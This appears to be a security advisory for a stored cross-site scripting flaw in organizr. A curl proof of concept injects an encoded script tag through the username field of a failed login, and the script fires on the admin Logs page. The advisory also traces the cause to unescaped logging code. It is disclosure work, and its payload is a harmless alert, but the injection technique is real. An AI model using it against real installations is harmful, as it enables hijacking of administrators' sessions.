# Description
A review of organizr’s logging system found it is possible for an unauthenticated threat actor to inject arbitrary JavaScript into the “Logs” page found within the administrator dashboard. In a default installation organizr is set to log failed login attempts. In these attempts, the system stores a number of records, one of which is the user supplied username. This username is then returned in the “User” column directly to users with access to the “Logs” table.
Data entered into this logs table is not escaped makin it possible to inject arbitrary JavaScript directly to a user with access to the “Logs” panel. The below curl command can be used to place a payload into the Logs table. After placing the payload login to an account with access to the “Settings” dashboard and open the “Logs” tab. The payload of “alert(2)” will fire.
Additional reviews found the application did not appear to provide any cutoff to the payloads length. Given this, it would be possible for threat actors to place complex and large payloads.
# Proof of Concept
“`
// PoC.js
curl ‘https://localhost/api/v2/login’ -X POST -H ‘User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0’ -H ‘Accept: */*’ -H ‘Accept-Language: en-US,en;q=0.5’ -H ‘Accept-Encoding: gzip, deflate’ -H ‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’ -H ‘Token: null’ -H ‘formKey: $2y$10$7DQp3wVaXory9HSag3/qF.P8PULxQXV5kwEnwkCpsp/eZBAaVib4q’ -H ‘X-Requested-With: XMLHttpRequest’ -H ‘Origin: https://localhost’ -H ‘Connection: keep-alive’ -H ‘Referer: https://localhost/’ -H ‘Cookie: organizrLanguage=en; organizr_user_uuid=38a2bb5e-3cd6-4156-a8bb-4eed8be6cf36’ –data-raw ‘loginAttempts=1&tfaCode=&username=%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&password=asdf&remember=true&oAuth=&oAuthType=&formKey=%242y%2410%247DQp3wVaXory9HSag3%2FqF.P8PULxQXV5kwEnwkCpsp%2FeZBAaVib4q’
“`
A review of orgaizr’s code found this vulnerability lies in the logging functions. The “setLoggerChannel()” function calls “setupLogger()” which leverages the user supplied username within the “setTraceId()” call. Prior to passing the username to setTraceId(), the value should be escaped .